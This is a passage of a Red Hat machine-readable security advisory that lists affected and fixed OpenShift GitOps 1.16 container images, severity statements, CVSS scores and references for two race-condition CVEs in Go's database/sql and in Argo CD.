"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat enforces the principle of least functionality, ensuring that only essential features, services, and ports are enabled. The environment leverages malicious code protections such as IPS/IDS and antimalware solutions that detect and respond to indicators in real time, limiting the impact of exploitation attempts. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks. In the case of successful exploitation, detection and containment controls are in place to limit impacts by alerting on anomalous system behavior in real time, while process isolation and automated orchestration via Kubernetes minimize the likelihood of concurrent execution scenarios that would trigger the race condition and help contain the impact to a single process.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:47:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17730"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-55191",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-09-30T23:00:51.184899+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400562"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions between 2.1.0 and 2.14.19, 3.2.0-rc1, 3.1.0-rc1 through 3.1.7, and 3.0.0-rc1 through 3.0.18 contain a race condition in the repository credentials handler that can cause the Argo CD server to panic and crash when concurrent operations are performed on the same repository URL. The vulnerability is located in numerous repository related handlers in the util/db/repository_secrets.go file. A valid API token with repositories resource permissions (create, update, or delete actions) is required to trigger the race condition. This vulnerability causes the entire Argo CD server to crash and become unavailable. Attackers can repeatedly and continuously trigger the race condition to maintain a denial-of-service state, disrupting all GitOps operations. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd/v2: github.com/argoproj/argo-cd/v3: Argo CD race condition leading to crash",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo CD server itself. The host system running Argo CD is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
